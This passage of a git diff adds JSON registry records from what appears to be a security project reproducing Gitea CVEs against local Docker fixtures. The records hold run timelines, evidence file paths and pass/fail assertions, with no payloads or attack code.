+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Proxy Boundary Fixture",
+    "proof_title": "Gitea Proxy Boundary Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:25:26+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2018-18926"
+    },
+    {
+      "at": "2026-03-18T01:25:26+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-proxy-boundary"
+    },
+    {
+      "at": "2026-03-18T01:25:27+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:25:41+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:25:43+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:25:43+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:25:45+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:25:45+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2018-18926-20260318012526"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "trusted forwarded headers crossed the boundary"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:25:26+00:00",
+  "finished_at": "2026-03-18T01:25:45+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/gitea-gitea--CVE-2019-1010261-20260318012624.json b/08-threat-intel/registry/runs/gitea-gitea--CVE-2019-1010261-20260318012624.json
new file mode 100644
index 00000000..800fc33d
--- /dev/null
+++ b/08-threat-intel/registry/runs/gitea-gitea--CVE-2019-1010261-20260318012624.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2019-1010261-20260318012624",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2019-1010261",
+  "repro_profile_id": "gitea-xss",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Stored XSS Fixture",
+    "proof_title": "Gitea Stored XSS Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:26:24+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2019-1010261"
+    },
+    {
+      "at": "2026-03-18T01:26:24+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-xss"
+    },
+    {
+      "at": "2026-03-18T01:26:24+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:26:28+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:26:28+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:26:29+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:26:29+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:26:30+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:26:30+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2019-1010261-20260318012624"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "stored payload rendered inside the browser proof page"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:26:24+00:00",
+  "finished_at": "2026-03-18T01:26:30+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/gitea-gitea--CVE-2020-13246-20260318012806.json b/08-threat-intel/registry/runs/gitea-gitea--CVE-2020-13246-20260318012806.json
new file mode 100644
index 00000000..e2b01700
--- /dev/null
+++ b/08-threat-intel/registry/runs/gitea-gitea--CVE-2020-13246-20260318012806.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2020-13246-20260318012806",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2020-13246",
+  "repro_profile_id": "gitea-proxy-boundary",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Proxy Boundary Fixture",
+    "proof_title": "Gitea Proxy Boundary Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:28:06+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2020-13246"
+    },
+    {
+      "at": "2026-03-18T01:28:06+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-proxy-boundary"
+    },
+    {
+      "at": "2026-03-18T01:28:07+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:10+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:11+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:11+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2020-13246-20260318012806"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "trusted forwarded headers crossed the boundary"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:28:06+00:00",
+  "finished_at": "2026-03-18T01:28:13+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/timeline.mmd"
+  }
+}
diff --git a/08-threat-intel/registry/runs/gitea-gitea--CVE-2021-28378-20260318012813.json b/08-threat-intel/registry/runs/gitea-gitea--CVE-2021-28378-20260318012813.json
new file mode 100644
index 00000000..e0aa251e
--- /dev/null
+++ b/08-threat-intel/registry/runs/gitea-gitea--CVE-2021-28378-20260318012813.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2021-28378-20260318012813",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2021-28378",
+  "repro_profile_id": "gitea-xss",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Stored XSS Fixture",
+    "proof_title": "Gitea Stored XSS Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2021-28378"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-xss"
+    },
+    {
+      "at": "2026-03-18T01:28:13+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:16+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:28:17+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:17+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:28:18+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:28:18+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:28:19+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:28:19+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2021-28378-20260318012813"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
